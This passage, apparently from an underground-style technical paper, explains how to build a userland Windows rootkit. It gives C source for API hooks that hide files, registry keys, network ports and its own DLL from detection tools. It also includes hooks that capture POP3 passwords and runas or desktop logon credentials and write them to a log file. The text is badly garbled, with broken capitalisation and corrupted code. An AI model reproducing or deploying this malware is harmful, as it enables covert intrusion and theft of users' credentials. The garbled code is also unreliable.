Subsequent Call to FindnextFile or FindClose.
If the function fails, the return value is invalid_handle_value.
The FindFirstfile Function is Called to Begin A File Search. If IT
Succeed, The Search May Be Pursued by Calling FindnextFile.
Bool FindNextFile
Handle Hfindfile,
LPWIN32_FIND_DATA LPFINDFILEDATA
);
The Hfindfile Parameter Is A Handle Returned by a Previous Call To
Findfirstfile or FindfirsTfileEx Function. Like Before, The LpfindFileData
Points to a the the win32_find_data structure That Receives Information About
The Found File or Subdirectory. The Structure Can Be Used in Subsequent
Calls to findnextfile to see the found file or directory. The function
Succeeds if it returns nonzero.
Let's have a look at the win32_find_data structure. The important me
IS cfilename which is a null-terminated string That specifies the name of
The file.
Typedef struct_win32_find_data {
DWORD DWFILEATTRIBUTES;
Filetime FTCREATIONTIME;
Filetime ftlastaccesstime;
Filetime ftlastwrittime;
DWORD NFILESIGHIGH;
DWORD NFILESZELOW;
DWORD dwreserved0;
DWORD dwreserved1;
TCHAR CFILENAME [MAX_PATH]; / * FULL FILE NAME * /
Tchar CalternateFileName [14]; / * File name in the classic 8.3
Filename.ext) File name format. * /} Win32_find_data,
* PWIN32_FIND_DATA;
To Perform A Directory Listing, An Application Calls FindfirstFile, And
THEN Calls FindnextFile Using The Returned Handle, Until It Returns Zero.
The ainsi and wide functions (a / w) of Findfirst / NextFile Operate Similarly
Except That The Wide Version Performs Calls to WideChartomultibyte, in
ORDER TO Convert Unicode Strings to ainsi.
-------------------------------------------------- ---
/ * MyFindFirstFilea: HIDES protected files from file listing
(Error Checks Stripped) * /
Handle WinApi MyFindFirstfilea (
LPCTSTR LPFILENAME,
LPWIN32_FIND_DATA LPFINDFILEDATA)
{
Handle hret = (Handle) 1000; / * Return Handle * /
INT GO_ON = 1; / * loop flag * /
/ * Process request * /
Hret = (Handle) FFindFirstFilea (lpfilename, lpfindfiledata);
/ * THEN FILTER: while we get a 'hidden file', we loop * /
While (Go_on &&
! _strnicmp (lpfindfiledata-> cfilename, RTK_FILE_CHAR,
Strlen (RTK_FILE_CHAR)))))))
{
Go_on = ffindnextfilea (HRET, LPFINDFILEDATA);
}
/ * OOPS, NO more Files? * /
IF (! go_on)
Return INVALID_HANDLE_VALUE;
Return hret;
}
---------------------- End Example 5 ------------------------- ----
And Now Let's Replace FindnextFilea:
----------------------------------------------------------------------------------------------------------------------------------------- ---
/ * MyFindNextFilea: HIDES protected files from being listed * /
Bool WinApi MyFindNextFilea (
Handle Hfindfile,
LPWIN32_FIND_DATA LPFINDFILEDATA
)
{
Bool ret; / * return value * /
/ * While We get a file what should not be shown, we get another: * /
DO
{
RET = FFINDNEXTFILEA (HFINDFILE, LPFINDFILEDATA);
} while (! _Strnicmp (lpfindfiledata-> cfilename, RTK_FILE_CHAR,
Strlen (RTK_FILE_CHAR)) && Ret! = 0); / * We're out of the loop so we can check if we broke because there
Is no more files. if it's the case, we may clear the
LPWIN32_FIND_DATA STRUCTURE AS THIS:
MY_MEMSET (LPFindFileData, 0, SIZEOF (LPWIN32_FIND_DATA);
* /
Return Ret;
}
---------------------- End Example 6 ----------------------- ----
------- [4.3. Registry
Preventing Its Launch Source from Being Detected Is Also An Unavoidable
Feature for this Kind of Rootkit. To Allow Registry Stealth, The Rootkit
Replaces The RegenvalUew API Inside The Memory Space of All Processes.
The Working Mode of The New Function IS Simple: IT Detects Itself
Listing The Content of a Key That Must Be Hidden, IT Returns 1 Which
TRAduces An error. The only problem with this item information is what
Calling process will stop ask for the listing of the content of the
Registry Key. Therefore, It Will Also Hide Subsequent Keys. As The Keys
Are Most of the Time Retrieved Alphabetically, The Rtk_reg_char Traducing
That the key is hidden must be starting by a character of high ascii code
SO That IT Will Be Retrieved Last and Won't Bother.
------------------------------------------------------------------------------- ---
/ * MyRegenumValue: hide registry keys when a list is request * /
Long WinApi MyRegenumValue
HKEY HKEY,
DWORD DWINDEX,
LPWSTR LPVALUENAME,
LPDWORD LPCVALUENAME,
LPDWORD LPRESERVED,
LPDWORD LPTYPE,
LPBYTE LPDATA,
LPDWORD LPCBDATA)
{
Long Lret; / * Return Value * /
Char BUF [256];
/ * Call Genuine API, Then Process To Hiding If Needed * /
Lret = FREGENUMVALUEW (HKEY, DWINDEX, LPVALUENAME, LPCVALUENAME,
LPRESERVED, LPTYPE, LPDATA, LPCBDATA);
/ * Convert String from Unicode * /
Widechartomultibyte (CP_ACP, 0, LPVALUENAME, -1, BUF, 255, NULL, NULL); / * if the key must be hidden ... * /
IF (! _ strnicmp ((char *) buf, rtk_reg_char, strlen (RTK_REG_CHAR))) {
LRET = 1; / * Then return -1 (error) * /
}
Return Lret;
}
---------------------- End Example 7 ------------------------- ----
------- [4.4. NetStat Like Tools.
NetWork Statistics Tools Are From Far The Most Vicious. There's a lot of
Ways to request the list of tcp / udp buy ports and the behavior of the
Same Application (NetStat, [TCPView], [Fport] ...) Varies from a Version of
Windows to another. this is especially true betWeen NT / 2000 and xp where
The Network Statistics Start To include the process Identifier of The process Identifier of The Process Identifier
Owner of Each TCP Connection. WhatVer The Way A Process Obtains There
Statistics, Some Dialog Has to Be Established with the TCP / UDP Driver
SITTING AT KERNEL Level (/ device / TCP and / device / udp). This Consists in
Calls to DeviceioControl to Establish a Request and Receive the Answer of
The driver. hooking at this level is Possible But from Far Risky and
Nightmarish, Since The Structure and Control Codes Used Arend
And Change Between Windows Versions. so the has to be performed at
DIFFERENT Level, Depending on The Quality of The Requested Information and THE REFES
OS Version.
As the rootkit must run under 2000 and xp, we have to consider Different
Case.
------- [4.4.1. The Case of Windows 2000
Under Windows 2000 The Extended API AllocateandGetTcpextableFromstack That
Associates a Process Identifier with a TCP Stream Does Not Exist Yet, SO
Information provided by the API Doesn't include this reason.
------- [4.4.1.1. Hooking gettcptable
The TCP Statistics May Officially Be Obtained by a call to gettcptable, Which Retrieves The TCP Connection Table (MIB_TCPTABLE).
DWORD GETTCPTABLE
PMIB_TCPTable PTCPTable,
PDWORD PDWSIZE,
Bool Border
);
The Functions Takes Three Parameters. The last one, border, decides
WHETER THE CONNECTION TABLE Should Be Sorted. Then, Pdwsize Specifies
Size of the buffer pointer by the ptcptable parameter on infut. on output,
If The Buffer Is Not Large ENOUGH To Hold The Returned Connection Table,
The Function Sets this parameter Equal to the required buffer size.
Finally, PTCPTable Points to a Buffer That Receives The TCP Connection
Table as a mib_tcptable structure. a sample retrieving the TCP Connection
Table is available online. [gettcp]
The MIB_TCPTable Structure Contains A Table of TCP Connections.
Typedef struct _mib_tcptable {
DWORD DWNUMENTRIES;
MIB_TCPROW TABLE [Any_SIZE];
} Mib_tcptable,
* PMIB_TCPTABLE;
Table is a pointer to a Table of TCP Connections Implement As an Array
Of MIB_TCPROW STRUCTURES, ONE for Each Connection.
A MIB_TCPROW Stands as Follows:
TypedEf struct _mib_tcprow {
DWORD DWSTATE;
DWORD DWLOCALADDR;
DWORD DWLOCALPORT;
DWORD DWREMOTEADDR;
DWORD dwremoteport;
} Mib_tcprow,
* PMIB_TCPROW;
While The DWSTATE DESCRIBES The State of A Given Connection, Dwlocaladdr,
DwlocalPort, dwremoteaddr, dwremoteport inform About the source and
Destination of the connection. We're intended in dwlocalport and
Dwremoteport to Determine if the port belongs to the secret range (BetWeen
RTK_PORT_HIDE_MIN AND RTK_PORT_HIDE_MAX) AND Thereforeformer be hidden.
To hide a row in tcp table if needed, The Mygettcptable Function Shifts
THE WHOLER ARRAY, Thus overwriting the unwanted memory zone. --------------------------------------- ----------------
/ * Mygettcptable Replacement for gettcptable.
(Error Checks Stripped)
* /
DWORD WINAPI Mygettcptable (PMIB_TCPTABLE_ PTCPTABLE, PDWORD PDWSIZE, BOOL
Border)
{
u_long localport = 0; / * Remote port on local machine endianness * /
u_long recoteport = 0; / * local port on local machine endianness * /
DWORD DWRETVAL = 0, NumRows = 0; / * Counters * /
INT I, J;
/ * Call Original Function, IF NO ERROR, Strip unwanted mib_tcprows * /
Dwretval = (* fgettcptable) (PTCPTable, PDWSIZE, BORDER);
IF (dwretval == NO_ERROR)
{
/ * for Each Row, Test if it must be stripped * /
For (i = 0; i <(int) ptcptable-> dwnumentries; i )
{
Localport = (u_short) FHtons (u_short)
(PTCPTABLE) -> Table [i] .dwlocalport);
RemotEport = (u_short) FHtons (u_short)
(PTCPTABLE) -> Table [i] .dwremoteport);
/ * If row virt be filtered * /
iShidden (LocalPort, Remoteport))
{
/ * Shift Whole Array * /
For (j = i; j <((int) ptcptable-> dwnumentries - 1); J )
Memcpy (PTCPTable-> Table [i]),
& (PTCPTable-> Table [i 1]),
SIZEOF (MIB_TCPROW_));
/ * ERASE LAST ROW * /
Memset (& (Ptcptable-> Table [J]),
0x00, sizeof (mib_tcprow_));
/ * Reduce Array Size * /
(* pdwsize) - = sizeof (mib_tcprow_);
(ptcptable-> dwnumentries) -;
}
}
}
Return dwretval;
}
---------------------- End Example 8 ------------------------- ----
Calling gettcptable is not the only way to get network statistics under
Windows 2000. Some Programs, Such As Fport Even Provide the Correspondence
Stream / Pid and Therefore deal Directly with the TCP DRIVER THROUGH THE
Deviceiocontrol function. Hijacking this api is not a good idea as ipplained before. In Consequence, The Approach I Adopted is to target
Specific Functions Used by WideSpread Security Tools Rather Than hooking a
Level Lower by Replacing Deviceiocontrol.
------- [4.4.1.2. Defeating NetStat
In this Version of Windows, Fport Isn't the Only One That Dires Directly
THE TCP / UDP Driver. this is also the case of netstat. To Defeat these
Programs, We Just Have to Replace Functions That Are Involved in Network
Statistic Processing from DeviceioControl Call to Screen Output.
With netstat, the idea is to hook the chartooembuffa API That Is Used To
Perform Characters Set Translations for Each Line Before IT IS Written To
Console Output.
Bool ChartooemBuff
LPCTSTR LPSZSRC, / * POINTER TO THE NULL-TERMINATED STRING TO
Translate. * /
LPSTR LPSZDST, / * POINTER TO The Buffer for the Transla
String. * /
DWord cchdstlength / * specifies the number of tchars to translate * /
);
If the rootkit notices itself being translating a string containing a
Hidden Port, IT Just Calls The Function with a Blank Buffer, So The
TRANSLATION WILL RESULT IN A Blank Buffer, And Output Won't show anything.
------------------------------------------------------------------------------------------------------------ ---
/ * MyChartooemBuffa: Replace the function use by Nestat to Convert
Strings to a Different Charset Before It Sends It To Output, So We CAN Get
Rid of some awkward lines ... :)
* /
Bool WinApi MyChartooEmbuff (LPCTSTSTR LPSZSRC, LPSTR LPSZDST,
DWORD CCHDSTLENGTH)
{
/ * If The Line Contains Our Port Range, We Simply Get Rid of
IT. * /
IF (strstr (lpszsrc, (char *) RTK_Port_HIDE_STR)! = null)
{
/ * WE CALL THE FUNCTION, PROVIDING A Blank String * /
Return (* fchartooembuffa) ("", lpszdst, cchdstlength);
Return (* FchartooemBuffa) (LPSZSRC, LPSZDST, CCHDSTLENGTH);
}
---------------------- End Example 9 ------------------------- ----
As NetStat Calls The Function for Each Line It Writes, There Is Not
Problem in Avoiding Whole One.
------- [4.4.1.2. Defeating fport
However, this is not the case of fport, Which Processes Output Character
By Character. i Chose to Hook The Writefile API, And SET UP A Buffer
Mechanism So Output is Done Line by line, and hiding therefore simpler.
----------------------------------------------------------------------------------------------------------- ---
/ * Convert fport.exe's output model from char by char to line by line to
Allow Hiding of Lines Containing Ports to Hide
* /
Bool WinApi MyWritefile (
Handle Hfile, / * Handle to File to Write To * /
LPCVOID LPBUFFER, / * Pointer to Data to Write To File * /
DWORD NNUMBEROFBYTESTOWRITE, / * NUMBER OF BYTES to WRITE * /
LPDWORD LPNUMBEROFBYTESWRITEN, / * POINTER TO NUMBER OF BYTES WRITTEN * /
LPOVERLAPPED LPOVERLAPPED / * POINTER TO STRUCTURE for Overlapped
I / o * /
{
BOOL BRET = true; / * returnizalue * /
Char * chr = (char *) lpbuffer;
Static DWORD TOTAL_LEN = 0; / * static length counter * /
Static Char Previouschars [2048 * 10]; / * static characters' buffer
(BOF?) * /
/ * Add the new character * /
Previouschars [Total_Len ] = Chr [0];
/ * Check for line termination * /
IF (chr [0] == '/ r')
{
Previouschars [Total_Len] = '/ n';
Previouschars [ Total_Len] = '/ 0';
/ * Show this Line Only IT Contains no Hidden Port / Process
Prefix * /
IF (strstr (char *) rtk_port_hide_str) == Null && Strstr ((char *) previouschars, (char *) RTK_PROCESS_CHAR) == NULL)
{
/ * Valid Line, So Process Output * /
Bret = fwritefile (Hfile, (void *) Previouschars,
Strlen (Char *) Previouschars,
LPNumberofbyteswritten,
LPoverLapped;
}
/ * Clear settings * /
MEMSET (Previouschars, 0, 2048);
Total_len = 0;
}
/ * Fakes the var, so fport can't see Output Wasn't Done * /
(* lpnumberofbyteswritten = nnumberofbytestowrite;
Return Bret;
}
---------------------- End Example 10 ------------------------- ----
------- [4.4.2. The Case of Windows XP
Under Windows XP Programs Have Not To Dear with Hell by Interacting
Directly The TCP / UDP Driver As The Windows API Provides Sufficient
Statistics. Thus, The Most Widespread Network Tools (NetStat, Fport,
Tcpview) Rely WHETER ON AllocateandGetTcpextableFromstack (XP Only) OR ON
THE CLASSIC GETTCPTABLE Depending on The Needs. So, To Cover THE
Under Windows XP, The Rootkit Has Just To Replace The AllocateAndgetTcpex
TableFromstack API. Searching The Msdn About this functions is ready.
This is an undocunted function. However it exissrs Some Useful Samples ON
The Web Such as [NetStatp] provided by Sysinternals That Are Quite
Explicit. The allocateandgettcpextablefromstack function takes the
Following parameters.
DWord AllocateAndgetTcPextableFromstack
PMIB_TCPEXTABLE * PTCPTABLE, / * BUFFER for the connection Table * /
BOOL BORDER, / * SORT TABLE? * /
Handle Heap, / * Handle To Process Heap Obtained by
Calling getprocessheap () * /
DWORD ZERO, / * undocumented * /
DWORD FLAGS / * undocumented * /
)
THE FIRST Parameter Is The One Interesting. It Points TO A MIB_TCPEXTABLE
Structure, That Stands for PMIB_TCPTABLE Extended, Looking as Follows.
/ * Undocunted extended Information Structures Available
ONLY ON XP and HIGHER * /
Typedef struct {
DWORD DWSTATE; / * State of the Connection * /
DWORD DWLOCALADDR; / * Address On Local Computer * /
DWORD DWLOCALPORT; / * Port Number On Local Computer * /
DWORD DWREMOTEADDR; / * Address On Remote Computer * /
DWORD DWREMOTEPORT; / * Port Number On Remote Computer * /
DWORD DWPROCESSID; / * Process Identifier * /
} Mib_tcpexrow, * pmib_tcpexrow;
Typedef struct {
DWORD DWNUMENTRIES;
MIB_TCPEXROW TABLE [];
} MIB_TCPEXTABLE, * PMIB_TCPEXTABLE;
This is The Same as The Structure Employed to Work with Gettcptable, SO
The Replacement Function's Job Will Be Somewhat Identical.
------------------------------------------------------------------------------- ---
/ *
AllocateandGetTcpextableFromstack Replacement. (Error Checks)
Stripped)
* /
DWORD WINAPI MyAllocateandGetTcPextableFromstack
PMIB_TCPEXTABLE * PTCPTABLE,
Bool Border,
Handle HEAP,
DWORD ZERO,
DWORD FLAGS
)
{
/ * Error Handler, TCPTable Walk Index, TcPtable Sort Index * /
DWORD ERR = 0, i = 0, J = 0;
Char psname [512]; / * process name * /
u_long localport = 0, Remoteport = 0; / * local & transote port * /
/ * CALL GENUINE FUNCTION ... * /
Err = FallocateandGetTcPextableFromstack (Ptcptable, Border, Heap,
ZERO, FLAGS;
/ * EXIT IMMEDIATELY ON Error * /
IF (ERR)
Return ERR;
/ * ... and start to filter unwanted rows. this will hide all
Opened / listening / connection / closed / ... Sockets That Belong To
Secret Range Or Reside in A Secret Process
* /
/ * for Each Process ... * /
For (i = 0; i <(* ptcptable) -> dwnumentries); j = i)
{
/ * Get process name to filter secret processes' sockets * / getProcessNameByPID ((* ptcptable) -> Table [i] .dwprocessid,
(char *) PSNAME);
/ * Convert from host to TCP / IP Network Byte Order
(Which is big-endian) * /
Localport = (u_short) FHtons (u_short)
(* ptcptable) -> Table [i] .dwlocalport);
RemotEport = (u_short) FHtons (u_short)
(* ptcptable) -> Table [i] .dwremoteport);
/ * Decide WHETHER to Hide Row or Not * /
IF (! _Strnicmp ((char *) psname, RTK_FILE_CHAR,
Strlen (RTK_FILE_CHAR))
|| Ishidden (LocalPort, Remoteport))
{
/ * Shift Whole Array * /
For (j = i; j <(* ptcptable) -> dwnumentries); J )
Memcpy ((* ptcptable) -> Table [J])),
(& (* ptcptable) -> Table [J 1])),
SIZEOF (MIB_TCPEXROWEX);
/ * CLEAR LAST ROW * /
MEMSET ((* ptcptable) -> Table [(((
(* ptcptable) -> dwnumentries) -1)]),
0, sizeof (miB_tcpexrowex);
/ * Decrease Row Number * /
(* ptcptable) -> dwnumentries) - = 1;
/ * Do The Job Again for The Current Row, That May Also
Contain a hidden process * /
CONTINUE;
}
/ * this Row Was OK, Jump to the next * /
i ;
}
Return ERR;
}
---------------------- End EXAMPLE 11 ------------------------- ----
The release process functions reside in kntinethide.c.
------- [4.5. Global TCP Backdoor / Password Grabber
As the rootkit is injected in Almost Every User Process, There's A
Possibility to set uppaddoor by Hijacking Recv and wsarecv,
Allowing Transforming Any Application (Including A Web Server), INTO AN
Opportune Backdoor. this is complicated enough to be a regard
Itself SO I Focused on a Password Grabber Virtually Able To Hijack
Passwords Sent by Any Mail Client [ksentinel]. Currently, IT Targets AT
Outlook and netscape mail client but may basily be extended to Otherapplications by Playing with the #defines. It Dynamical Hijacks The TCP
Stream When the Mail Client Deals with Remote Server. Therefore, IT Allows
To grab user and pass commands to be used for later privileges escalation.
-------------------------------------------------------------------------------------------------------------------------- ---
/ * POP3 Password Grabber. Replaces The send () socket function.
* /
Int WinApi Mysend (Socket S, Const Char Far * BUF, INT LEN, INT FLAGS)
{
int RetVal = 0; / * Return Value * /
Char * packet; / * Temporary Buffer * /
IF (! fsend) / * No One lives for Ever (ERROR Check) * /
Return 0;
/ * Call Original Function * /
Retval = fsend (S, BUF, LEN, FLAGS);
/ * packet is a temp buffer use to deal with the buf parameter
That May Be in a DiffERENT MEMORY Segment, So We Use
Following Memcpy trick.
* /
Packet = (char *) Malloc ((len 1) * sizeof (char));
Memcpy (Packet, BUF, LEN);
/ * Check if Memory is Readable * /
IF (! isbadstringptr (packet, len))
{
/ * Filter Interesting Packets (POP3 Protocol) * /
IF (strs, "user") || strstr (packet, "pass"))
{
/ * Interesting Packet Found! * /
/ * Write a string to logfile (% user
Profile% / ntillusion_passlog_file) * /
Output2logfile ("'% s' / n", packet;
}
}
Free (packet);
Return RetVal;
}
---------------------- End Example 12 ------------------------- ----
FTP logins and passwords may also be grabled by adding the profper
Expression in the filter condition.
------- [4.6. Privilege Escalation
Catching pop3 and ftp passwords may allow spreading on the local machine
Sincenrs offen use the Same Password on diffounts. Anyway when
Grabbing a password buy to login as another user on the machine, There'sno doubt That The Password Will Be Efficient. Indeed, The Rootkit
Attempts to Impersonate Another User from The Desktop. This is the case
When a user employs the runas command or selects "The Run As User" MENU
By Right Clicking on an Executable. The API Involved in these Situations
Are Redirected So Any Successful Login Is Carefully Saved On Hard Disk for
Further USE.
This is achieved through the replacement of logonusera and createprocess
WITHLOGONW.
The Runas Tool Present on Windows 2000 / XP Relies on CreateProcessWith
Logonw. ITS Replacement Follows.
--------------------------------------------------- ---
/ * MyCreateProcessWithlogonw: Collects logins / passwords Employed to
Create a process as a user. This catches Runas Passwords.
/ NOPROFILE / User: Mybox / User CMD)
* /
Bool WinApi MycreateProcessWithlogonw (
LPCWSTR LPUSERNAME, / * User Name for log in request * /
LPCWSTR LPDOMAIN, / * DOMAIN NAME for log in request * /
LPCWSTR LPPASSWORD, / * Password for log in request * /
DWORD DWLOGONFLAGS, / * LOGON OPTION * /
LPCWSTR LPAPPLICATIONNAME, / * Application Name ... * /
LPWSTR LPCOMMANDLINE, / * COMMAND LINE * /
DWORD DWCREATIONFLAGS, / * REFER TO CREATEPROCESS * /
LPVOID LPENVIRONMENT, / * ENVIRONMENT VARS * /
LPCWSTR LPCURRENTDIRECTORY, / * BASE DIRECTORY * /
LPStartupinfow LPStartupinfo, / * Startup and Process Infor, See
CREATEPROCESS * /
LPPROCESS_INFORMATION LPPROCESSINFO)
{
BOOL BRET = false; / * returnizalue * /
Char line [1024]; / * buffer use to set up log lines * /
/ * 1st of All, Log on the user * /
Bret = FcreateProcessWithlogonw (lpusername, lpdomain, lppassword,
Dwlogonflags, LPApplicationName, LPCommandline, DWCREATIONFLAGS, LPENVIRONMENT, LPCURRENTDIRECTORY,
LPStartupinfo, LPPROCESSINFO);
/ * Inject the created process if its name doesn't begin by
RTK_FILE_CHAR (Protected Process) * /
/ * Stripped [...] * /
/ * Log the information for further us * /
MEMSET (Line, 0, 1024);
IF (BRET)
{
Sprintf (Line, "Domain '% s' - login '% s' - password '% s' -
Logon Success ", LPDOMAIN, LPUSERNAME, LPPASSWORD);
}
Else
{
Sprintf (Line, "Domain '% s' - login '% s' - password '% s' -
Logon Failed, LPDOMAIN, LPUSERNAME, LPPASSWORD;
}
/ * Log the line * /
Output2logfile ((char *) line;
Return Bret;
}
---------------------- End Example 13 ------------------------- ----
Under Windows XP, Explorer.exe Offers A Gui To Perform Logon Operations
From the desktop. This Relies on logonuser That May Be replaced as below.
We're Intested Only in lpszuserName, Lpszdomain and lpszpassword.
-------------------------------------------------- ---
/ * MYLOGONUSER: Collects logins / passwords Employed to log on from the
Local station * /
Bool WinApi Mylogonuser (LPTSTSTSTSTSTSTSTSTSTSTR LPSZDOMAIN, LPTSTR
LPSZPassword, DWORD DWLOGONTYPE, DWORD DWLOGONPROVIDER, PHANDLE PHTOKEN
{
Char BUF [1024]; / * Buffer used to set up log lines * /
/ * SET UP BUFFER * /
MEMSET (BUF, 0, 1024);
Sprintf (buf, "login '% s' / passwd '% s' / domain '%' / n",
lpszusername,
Lpszpassword,
lpszdomain;
/ * Log to disk * /
Output2logfile ((char *) BUF);
/ * Perform logonuser call * /
Return Flogonuser (LPSZUSERNAME, LPSZDOMAIN, LPSZPASSWORD,
Dwlogontype, dwlogonprovider, phtokeen;
}
----------------------- EXAMPLE 14 ------------------------- ---- The Grabbed Data Are Sent to A Log File At User Profile's Root and May Be
Encrypted using a simple 1 byte xor key.
------- [4.7. Module Stealth
As soon as it is loading Into a process, The rootkit hides its dll.
Therefore, if The System Does Not Hook LDRLOADDLL or ITS Equivalent AT
Kernel Level, IT APPEARS That The Rookit Was Never Injected Into
Processes. The Technique Used Below Is Very Efficient Against All Programs
That Rely on The Windows API for Enumerating Modules. Due to The Fact That
EnumprocessModules / Module32First / Module32Next / ... Depend On NTQuerySystem
Information, and Because this Technique Fools The Manner this API
Retrieves Information, There's No Way to Be Detected by this intermediate.
This Defeats Programs Enumerating Processes' Modules Such as Listdlls,
ProcessExplorer (See [Listdlls] and [ProceXp]), And Vice Rootkit Detector.
[Vice]
The Deception is Possible in Ring 3 Since The Kernel Maintains a list of
Each Loaded Dll for a Given Process Inside ITS Memory Space, in Userland.
ThereFore A Process May Affect Himself and Overwrite Parts of Its Memory
In Order to Hide ONE OE ITS Module. These Data Structures Aref
undocument But Can Be Recovered by Using The Process Environment Block
(PEB), LOCATED AT FS: 0x30 INSIDE EACH Process. The Function Below Returns
The Address of the Peb for the current process.
------------------------------------------------------------------------------------------------------------ ---
DWORD getPeb ()
{
DWORD * dwpebbase = null;
/ * RETURN PEB Address for Current Process
Address Is Located AT FS: 0x30 * /
__ASM
{
Push EAX
Mov Eax, FS: [0x30]
MOV [dWPEBBASE], EAX
POP EAX
}
Return (DWORD) DWPEBBASE;
}
---------------------- End EXAMPLE 15 ------------------------ ----
The role of the peb is to gather frequently access information for a
Process As Follows. AT Address Fs: 0x30 (or 0x7ffdf000) Stands The
FOLLOWING MEMBERS OF THE [PEB].
/ * located at 0x7ffdf000 * /
Typedef struct _peb
{
Boolean inheritedaddressSpace;
Boolean ReadimageFileExecOptions;
Boolean beingdebugged;
Boolean spare;
Handle mutant;
PVOID imageBaseAddress;
PPEB_LDR_DATA LOADERDATA;
PRTL_USER_PROCESS_PARAMETERS Processparameters
[...]
Ulong sessionid;
} PEB, * PPEB;
THE INTERESTING MEMBER IN OUR CASE IS PPEB_LDR_DATA LOADERDATA THAT
Contains Information Filled by the loader at Startup, and when
Happens a dll loading / unload.
Typedef struct _peb_ldr_data
{
Ulong Length;
Boolean Initialized;
PVOID SSHANDLE;
List_ENTRY INLOADERMODULELIST;
List_ENTRY INMEMORYORDERMODULIST;
List_entry ininitializationOrderModuLIST;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
THE PEB_LDR_DATA STRUCTURE CONTAINS Three List_ENTRY THATRY THATRY THATER PART OF DOUBLY
LINKED LISTS GATHERING INFORMATION ON LOADED DLL IN The Current Process.
InlineorderModuleList Sorts Modules in Load Order, InmemoryOrdermoduleList
In Memory Order, and INITIALIZATIONORDERMODULIST Keeps TRACK OF THEIR
Load Order Since Process START.
THESE DOUBLY LINKED LIST Contains Pointers to LDR_Module Inside To LDR_MODULE INSIDE THENT
Structure for Next and Previous Module.
TYPEDEF STRUCT _LDR_MODULE {
List_ENTRY INLOADERMODULELIST;
List_ENTRY INMEMORDERMODULANLIST; LIST_ENTRY ININITIALIZATIONORDERMODULIST
Pvoid Baseaddress;
PVOID ENTRYPOINT;
Ulong sizeofimage;
Unicode_string fulldllname;
Unicode_string basedllname;
Ulong flags;
Short loadcount;
Short tlsindex;
List_ENTRY HashTable;
Ulong timedatestamp;
} LDR_Module, * PLDR_Module;
IN FACT, this is not exactly true since list_entry Have A Special
Behavior. Indeed, The Base Address of The Surrounding Object IS Comput
By Subtracting the Offset of the list_entry member from it's address
(& List_entry), Because List_entry Flink and Blink Members Always Point To
The Another List_Entry Inside The List, Not to The Owner of The List Node.
This Makes It Possible To Interlink Objects in Multiple Lists WITHOUT ANY MULTIPLE LISTS WITHOUT
Interference As Explains Sven B. Schreiber in undocunted Windows 2000
SECRETS. To Access InlineorderModuleList Elements, We don't have to bother
About Offsets Since It Is The First Element of The LDR_Module Structure So
IT Just Needs to Be Casted TO GET A LDR_MODULE from a list_entry. in The
Case of INMEMORYORDERMODULIST We'll Have to Subtract Sizeof (List_entry).
Similarly, to Access The LDR_Module from IninitializationOrderModuleList
We Just Subtract 2 * sizeof (list_entry).
The Following Sample Demonstrates How To Walk ONE OF THESE LISTS AND THROW
A Module Away According To ITS Name (Szdlltostrip).
------------------------------------------------------------------------------------------------------------ ---
/ * WALKS One of the Three Modules Double Linked Lists Reference by The THE
PEB (Error Check Stripped)
ModuleListType is an in Which List to OPERATE:
Load_order_type <---> InloadOrdermoduleList
MEM_ORDER_TYPE <---> INMEMORYORDERMODULIST
INIT_ORDER_TYPE <---> IninitializationOrdermoduleList
* /
Int WalkmoduleList (Char modulelisttype, char * szdlltostrip)
{
INT I; / * Internal Counter * /
DWORD pebaSEADDR, dwoffset = 0;
/ * Module List Head and ITERATING POINTER * /
PLIST_ENTRY PUSERMODULANLISTHEAD, PUSERMODULISTPTR;
/ * PEB-> peb_ldr_data * /
PPEB_LDR_DATA PLDRDATA;
/ * Module (s) name in unicode / ainsi * /
PUNICODE_STRING PIMAGENAME;
Char szimagename [bufmaxlen];
/ * First, get process environment block * /
PebbaseAddr = getPeb (0);
/ * Compute peb-> peb_ldr_data * /
PLDRDATA = (PPEB_LDR_DATA) (DWORD *) (* (DWORD *) (PEBBASEADDR
PEB_LDR_DATA_OFFSET));
/ * Init Linked List Head and Offset In LDR_Module Structure * /
IF (ModuleListType == Load_order_type)
{
/ * InlineorderModuLIST * /
PusermoduleListhead = PUSERMODULISTPTR =
(PLIST_ENTRY) (& (PLDRDATA-> MODULISTLOADORDER);
Dwoffset = 0x0;
} else if (ModuleListType == MEM_ORDER_TYPE)
{
/ * INMEMORYORDERMODULIST * /
PusermoduleListhead = PUSERMODULISTPTR =
(PLIST_ENTRY) (& (PLDRDATA-> ModuleListMemoryOrder);
Dwoffset = 0x08;
} else if (modulelisttype == init_order_type)
{
/ * IninitializationOrdermoduleList * /
PusermoduleListhead = PUSERMODULISTPTR =
(PLIST_ENTRY) (& (PLDRDATA-> ModuleListInitOrder);
Dwoffset = 0x10;
}
/ * Now Walk the SELECTED LIST * /
DO
{
/ * Jump to next ldr_module structure * /
PUSERMODULISTPTR = PUSERMODULISTPTR-> FLINK;
PimageName = (Punicode_String) (
(PuserModuleListPtr) (LDR_Data_pathfilename_offset-dwoffset);
/ * Decode Unicode String to Lower Case on the fly * /
For (i = 0; i <(pimagename-> length) / 2 && i SzimageName [i] = lowcase (* ((pimagename-> buffer) (i)))); / * Null terminated string * / SzimageName [i] = '/ 0'; / * Check if it's target dll * / IF (strstr ((char *) szimagename, szdlltostrip)! = 0) { / * Hide this DLL: throw this module Away (Out of The double linked list (PUSERMODULISTPTR-> BLINK) -> FLINK = (PusermoduListPtr-> flink); (PUSERMODULISTPTR-> FLINK) -> BLINK = (PusermoduleListptr-> blink); / * Here We May Also Overwrite Memory to Prevent Recoverge (paraNid Only; P) * / } WHILE (PUSERMODULISTPTR-> FLINK! = PUSERMODULISTHEAD); Return Func_suCcess; } ---------------------- End Example 16 ------------------------- ---- TO Process The Three Linked Lists, The Rootkit Calls The Hidedll Function Below. --------------------------------------------------------------------------------------------------------------------------------------------------------- --- Int Hidedll (Char * szdllname) { Return (WalkModuleList (Load_order_type, szdllname) && walkmodulelist (Mem_Order_Type, Szdllname) && walkmodulelist (init_order_type, szdllname); } ---------------------- End Example 17 ------------------------- ---- I Never Saw this Method Employed to Hide a Module But Instead to Recover The Base Address of A DLL IN ElaBorated Shellcodes [pebshlcde]. To end with this technique, I'll Say That It Is from Far Efficient Against Ring 3 Programs But Becomes a little bit ineffective against a Personal Firewall Acting At Kernel Level, Such As Sygate Personal FireWall. this One Cannot Be Defeated Using The Presented Method and Analysis of Itssource Code Shows As It Sets Hooks in The Kernel Syscall Table, Thereby Being Informed As Soon As a DLL Is Loaded Into Any Process and Subsequent Hiding is useless. in a Word, Personal Firewalls Are The Worst Enemies of Userland rootkits. ------- [5. Ending ------- [5.1. Conclusion The Mechanisms Presented in this 